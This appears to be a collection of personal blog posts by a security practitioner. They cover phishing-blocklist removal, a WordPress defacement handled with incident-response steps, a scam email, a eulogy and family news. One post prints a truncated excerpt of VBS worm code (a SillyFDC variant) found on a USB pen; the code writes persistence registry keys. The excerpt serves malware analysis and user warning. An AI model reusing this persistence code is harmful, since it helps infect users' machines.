When I say firewall, I mean a good, old layer 3 packet filtering device. The things that cost $100 new and are, well, ADSL routers with added security aren’t able to protect a small office by themselves. Added security  equals access control lists in a pretty GUI, so not really the poster boy for defense in depth.

Amazing that some IT “professionals” actually believe having a firewall will stop pc’s from getting malicious software. Thanks goodness the USB device fad never took off.

If you do not have anti-virus software on your home or small office computer, Microsoft provides a free copy you can download from here: http://www.microsoft.com/security_essentials/

It does the job, is simple to use and doesn’t cost a penny. You want something with all the whistles and bells, pick a security suite package from any of the big names.

We now return to our regular programme.

The first one to fix is Web of Trust (WOT), a plug-in for Firefox that is used as part of safe browsing.

Simple option is to create an account, link to your site under the My Site option, and save the web cookie verifier .html file on your home page. Click on verify the site and request it be reviewed. To speed up the process you can ask a few folks to certified it all okay. Takes about a day to go from Red and malicious to Green and good.

The second on is the excellent folks at www.phishtank.com who help steer folks away from evil phishing sites. They are part of OpenDNS, so if you’re using OpenDNS services, this site is marked as a phishing site and you’re told not to enter. OpenDNS results are used by other services, so fixing the reputation here will clean up other safe browsing tools.

Despite my site not being an actual phishing site, the bad guys linked through my domain name to a compromised web site on the same server.

So should you type:

www.chris-mohan.com/~hackedsite/Evil_Fake_PayPal_Phishing_Site/cc.php?cmd=_Confirm_being_ripped_off

and the computer translates it to :

10.1.10.1/~hackedsite/Evil_Fake_PayPal_Phishing_Site/cc.php?cmd=_Confirm_being_ripped_off

The /~hackedsite being another user account on the same server as me. Linux helpfully understands the command uses the ip address of my site (which is the same as a couple of hundred hosted others) and redirects to hackedsite web site. in effect this is what happens

10.1.10.1/~hackedsite/Evil_Fake_PayPal_Phishing_Site/cc.php?cmd=_Confirm_being_ripped_off

The web site hackedsite got closed down when I reported it by the hosting company, so phishing was no longer an issue.

I registered  an account  on www.phishtank.com and asked for the site to be review and reclassifed now that the bad stuff has been removed. Now waiting to see how long it takes before being reviewed.

Update: The faster way to get the site off phishtank was to send an email to the support team at OpenDNS. The team there turn around my request in under a day

It was a lovely though and I was touched by the gesture.

Both items are of the geek variety and bought from stalls, one a ball point pen with a built in 2GB USB stick that can act as a voice recorder and the other a 240GB USB stick.

3-in-1 Pen-recorder-malware

240GB Flash drive - really?

Now, from having worked with companies that operate in Asia and especially China, I’ve often discovered that some of pieces of technology come with free added “extras”.

I have to admit some level of amazement when told of the 240GB USB flash drive, especial when the afore mentioned relative said he hadn’t seen the 500GB USB flash drive after he’d bought this one. I thought the largest current flash drive available was on 128GB, sadly it appears I was right. A quick search of 240G Sony quick turned up this page. This thing is a total fake and is actually a whooping 32MB. However it looks pretty and I can amaze my friends and family with a 234GB drive that I can’t save anything to. Might give it to the Auditors next time they’re in the office.

Wow it's really 234GB - honest!

I plugged both USB devices in to a spare Linux machine, just to see it any software was on either. The Fake 240GB USB was empty, but the recording pen had lots of goodies.

The first thing that caught my eye was the autorun.ini file. A quick look at that pointed to a MS-DOS.COM saved on the pen. After a quick imaging of the files, I decide to open a copy of the MS-DOS.COM.

The random looking junk didn’t quite look like normal .COM file junk, if only I could have taken SANS Reverse-Engineering Malware: Malware Analysis Tools and Techniques course, I may have been able to do a better analysis. However, halfway through the file, the weird characters disappeared and stuff I can recognize and understand appears in plain English.

This is some of what I extracted:

Dim fs,rg

Set fs = CreateObject("scripting.filesystemobject")

Set rg = CreateObject("wscript.shell")

On Error Resume Next

rg.RegWrite "HKCR\.vbs\", "VBSFile"

rg.RegWrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE","C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"

rg.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"

rg.RegWrite "HKCR\MSCFile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"

rg.RegWrite "HKCR\regfile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"

rg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

rg.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

– Plenty more VBS code chopped out –

This clearly isn’t a real .Com file. Two seconds of searching found out that this is a variant of the SillyFDC worm. A write up of it here talks how it was slapping the US military systems around back in 2008. Most antivirus software would have picked it up, but then again, why test it.

Moral of the story, if you buy kit like this, for the “best price” for a back street stall, buyer beware. Unless you’re a Malware researcher then go mad, it’s Christmas day with every item bought!

Being attacked and having to recover is sadly part of IT life these days, but the more practice, the better you get at it. I’m oddly indebted to this particular attacker as it meant I’ve had to spend time understanding how the hosting company works, how this site is put together and the glaring shortfalls of outsourcing management and security to a third party.

On the 31st of May this blog was defaced and had a number of files uploaded to it.

The defacement was of a political, religious statement nature, which I’d suggest defacing web sites is a bit of a waste of time. Given the attacker lives in a democracy, whether he believes it is or not, I’d recommend he’d spend the time working in worth while, legal groups to express his views or simply help out the local community. If you have a voice and a vote use it, people change the world by words and deed, not by petty vandalism or criminal Paypal pharming schemes to steal money from your fellow man.  I’ll get off my soap box now.

On the 7th of June, I actually noticed the defacement. Oops.

Note to self – be more narcissistic and look at my own blog more often.

In under a minute, I went from shock to annoyance to curiosity. How did this guy get in, what was he actually doing and would I be able to work out how to stop it again?

I wasn’t able to log on to the cpanel to control the site, the wacky security of putting it on a random port over https does not work for locked down corporate environments.

So the first step was to call the hosting company and ask if this was a mass defacement or just me. A number of hosting companies hosting word press site had be compromised due to their bad practices, so best to check. Fortunately for  me I go the support “consultant” that struggled with English. After a painful twenty minutes, the best I got out of the conversation was for him to reset a password and mine was the only site hacked. More on this later. He did offer the gems of: Change your password every couple of weeks and don’t set stuff to 755. Magic. If I was a normal human being 755 would mean the world to me. Thank you!

This is now a great time to bring up the SANS six step incident response steps process. These steps help work through how to deal with this mess:

1. Preparation 2. Identification 3. Containment 4. Eradication 5. Recovery 6. Lessons learned

Identification

After  finish work, I finally got on to the site control panel via cpanel and kicked off a backup of the site just to examine off line what had happened.

The defacement was a simple replacement of the index.php file, which contained a lot of meta data. This meta data confirmed the OS, who had customized the OS and where to get a copy of it, what version of Word the defacement page had been made with and a few other pieces of helpful data. What was really interesting was the uploaded fake PayPal.fr payment page sub-directories and file in the public_html folder. The blog’s site logs also contained entries like this:

/~silkhous/PayPaI.Com/confirmmation4548664512884645384534/B!M@R/ProfileCCAdd.js

The /~silkhous refers to another home directory on the same hosted server as my blog. Looks like the other site was suffering the same problem, so much for me with the only site being attacked. Nice work hosting provider!

This caused an instant road block. Alerting Paypal that people are being pharmed out weighted my curious and recover process. As there’s no clear, direct way to contact Paypal’s security team, I had to go through customer service. The very nice lady somewhat taken back that someone might do this and asked me to submit my findings to an email address. When I asked to speak to someone directly, I was told the security team was a back office group and couldn’t be directly contacted. Oh well, the Paypal rep was helpful and was pretty excited, so I sent the details off and went back to the clean up.

Containment, Eradication and Recovery

What I’d found didn’t give me any real clear indications of how the attacker got in. I knew what he’d done to the site, and as he’d kindly defaced the site and tagged it with his email address, I was able to out a fair bit of information on him just from search engines. Still, no clear method of how he got in.

The common options to break in to a WordPress/web site are

1) The hosting provide is vulnerable to attacks and then control the entire server*

2) Bad passwords – allowing brute force attacks (password guessing)

3) Poorly written plug-ins allow attackers to execute code and commands on the site

4) Old version of Word Press allow attackers to execute code through know vulnerabilities

I can safely rule out 2 and 4 as entry points, which leaves only 3 something I can do about now.

Since I make backups of the site every after x number of blog pieces I upload, I decided to delete the entire site and upload a fresh copy of WordPress. Using a couple good articles from WordPress, I picked the parts that worked for me from them to add additional security.

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://codex.wordpress.org/Hardening_WordPress

I then move back old versions of the content to the blog, tested, made a few more changes, took a back up again and then reset the passwords again and ran one final check.

*Should this happen again, time to move web site providers to someone who keeps their OS and software up to date…

Lessons Learned

• RTFM WordPress’ security guides
• Avoid having gadgets and plugins just because the look pretty
• Understand the structure and layout of WordPress and the web site
• More regular backups
• Rotate the access logs off the server

So am I safe now?

Possibly, possibly not.

I can say I’ve improved the security of the site and cleaned up some crap. As I still don’t know how he got in, he may just read this, get annoyed and deface the site again using the same hole he did last time. As I think he just ran an automated scanner to find “x” problem then automatically exploit it, he probably won’t read this or even visit the site. Saying that, only a very small number of sites got exploited, so he might come back to visit.

If so and that’s you Mr Attacker- Bonjour là, signalent un commentaire et me font savoir vous êtes entré la première fois. Merci !

I would have used Arabic, but I don’t really trust the translation software. I’ve seen what it does to English.

These guys do great work, have excellent clients and the environment to sharpen your security skills to a razor’s edge.

Normally, I’d leave you to hunt through your favorite job web site but, in a moment of kindness, feast your eyes on this

On a mildly serious note, you would struggle to find similar opportunities for skills and career advancement in the security field. The team there are great to work with and there’s no end of learning opportunities.

I can read and carry all my geeks book, massive pdf files and evil security books without raising suspicions.

I get curious glances on the bus, but none of the looks of outright horror and fear when I leafing through a 1000 pager on TCP/IP.

I can quickly flip to a human friendly book if someone takes and interest in the kindle and wow them with free access to buy books anywhere in the world.

Then I can sneak back to reading up on BOFs, SEH and other three letter acronyms (tla) of the IT world with click of a button.

Even the Microsoft training manual PDF’s overly Visio-ed diagrams come out well.

Mu-ha-ha

Now if only copy write laws banning thousands of books being delivered to Australia based kindles could be sorted, I’d be a very happy man.

My wonderful brother, Paul, and his beautiful wife, Diana, have given birth to their first born.

I got to see him, via the magic of Skype, on his first day home.

There are no words to express my joy and love for them.

I am an uncle!

I shall miss my friend’s remarkable insights, stark reality checks, thoughtfulness and generosity of spirit. His courage in taking leaps in to unknown was almost easily missed, cloaked in one of his shrugs and casual comments. It took years to notice and years to figure out, but that was Paul, a bit of an enigma.

From college lectures to travelling over parts of the country, we shared some great adventures, utter failures, some awful drinks and a lot of getting side tracked.

On his first flight, he flew to India and spent months in a totally alien culture, travelling to as many places time allowed him to reach. I still have his one piece of communication, a letter, he managed to construct over the many months away. The letter arrived almost on the same day Paul returned home. It had taken three months to write and jumped from adventure to disaster to discovery. It was all over the shop, but gave a joyful tour of what he experienced and amazing sights, places and people of this other world.

Paul’s love of reading and understanding took him to Aberystwyth University in Wales. In a memorable road trip, two of us packed Paul and all his worldly belongings, minus a few hundred books, in to a small car and set off for Wales. Despite Jude’s military training we still managed to get horribly lost and found ourselves in the middle of a desolate Welsh valley in a somewhere in an unknown Nation Park. Undeterred by have not the slightest idea of where we were, being forced to dodge the local wild life or how the road dropped precipitously at ever corner, we forged on with the light failing rapidly. Several hours later and with a great deal of luck, smoking of cigarettes and rationing of the chocolate stash, we finally limped into Aberystwyth.

We deposited Paul’s belongs deep in some student hall and promptly took him to a pub, piled him with copious amounts of alcohol as a farewell gesture. We said our goodbyes and left him surrounded by suitably drunken fellow students, looking out over the Welsh coastline. It was only after several hours of driving did we realise that he had no clue how to find his way back to his new residence. That night was spent drunken cursing us while climbing at very, very steep hills to try each University digs to find his room. Doing this in the fresh, brisk, biting sea air, massive amount of excursion, a slowly developing hangover and signs all in Welsh only wasn’t as funny as we found it, apparently.

Even as one of the “old” students, he manage a fair bit of mischief during that time but kept an eye on the uni kids that inhabited that part of his life. He proudly achieved his degree in Information & Library Studies and proved to a great deal of people he was much more than they realised.

I got to work with Paul a couple of times. Whether it was setting up show jumping rings, cooking for the masses or working in IT, he always maintained an almost stubborn common sense and pragmatism approach. He’d often played the role of the heavy, casting black looks and unflinchingly doing the dirty work; he always approached it intelligently and with care if you took the time to notice.

I have a thousand and one stories ranging from him always having time to talk with the homeless of Brighton to the time he nearly ran me through with a fencing foil. Ended up at standing at Stone Henge on the Autumnal equinox at midnight being mistakenly hunted by security is one I still have photographic evidence of to prove it actually occurred. That’s what happens when you get to be someone’s friend for more than twenty year.

He found love, friendship, peace and happiness with Julie in recent years.

My friend passed away on the 25^th Of December, 2009.

He remains in my mind’s eye propped against a wall with a half read book in hand, bag slung causally over his shoulder and can of coke fighting for space with a pack of cigarettes in a pocket peeking out. A disapproving, well practiced, “you’re late” look on his half shaven face offset with a mirthful sparkle in those brown eyes.

Had a couple of concerned people asking about emails they’d received. These emails were similar to this somewhat edited version:

________________________________________

Dear Someone Important,

We are a professional internet consultant organization in Asia, we have a pretty important issue needing to confirm with your company. On Date , we received an application formally, one company named “Tianle Holdings Ltd” applied for the brand keyword “scam_me” and following domain names:
scam_me.sg
scam_me.me
scam_me.com.sa
scam_me.pk
scam_me.com.kz
scam_me.bh
scam_me.com.mo
with our organization.

During our preliminary investigation, we found that these domain names’ keyword is identical with your trademark. I wonder whether you consigned Tianle Holdings to register these domain names with us? Or is Tianle Holdings your business partner or distributor in Asia?

Currently, we have already postponed this application of this company temporarily. Therefore please let the relevant person make a confirmation with me by telephone or email ASAP.

Best Regards,

Amy  Wen

Web: http://www.wtl.hk.cn
Tel:  +00852_9566_0103
+00852_9566_0205
Fax: +00852_3019_7872
Email: amy@west-idc.org
amy@sc-domain.org

________________________________________

Smelt like a scam to me. 

Two seconds of searching dug up a number of angry web sites confirming this was indeed a scam. 

Fraudwatchers have the sensible response from the Oz government but a more useful block list has been created by the folks of Firetrust. Chris has put together all the email domains these particular scammers are using.

I copied the list and added it in to our black list of bad domains and told the folks not to worry about these emails any more.

If you get one of these emails, add the domain it was sent from to your blocked black list and delete the email. It’s a scam to get your money.

He decided to throw away any form of social life and take the CISSP and the OSCP exams before the 30th of October. He is recording his decent in to madness here

He is, as we like to say, a nutter.

Hopefully, he bring some words and gems of genius on his studying.

Best of luck.